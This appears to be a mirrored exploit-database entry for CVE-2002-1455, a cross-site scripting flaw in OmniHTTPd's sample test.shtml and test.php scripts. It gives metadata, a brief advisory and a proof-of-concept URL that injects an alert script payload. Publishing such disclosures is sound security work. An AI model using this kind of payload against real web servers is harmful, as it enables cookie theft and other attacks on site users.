[] NeoSense
E X P L O I T S
title author type platform port cve id

OmniHTTPd 1.1/2.0.x/2.4 - test.shtml Sample Application Cross-Site Scripting

Author: Matthew Murphy
type: remote
platform: windows
port: 
date_added: 2002-08-26 
date_updated: 2012-10-06 
verified: 1 
codes: CVE-2002-1455;OSVDB-9217 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/5568/info

Cross site scripting vulnerabilities have been reported in multiple sample scripts including with OmniHTTPD. In particular, test.shtml and test.php contain errors.

This type of vulnerability may be used to steal cookies or perform other web-based attacks.

http://localhost/test.shtml?%3CSCRIPT%3Ealert(document.URL)%3C%2FSCRIPT%3E=x
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.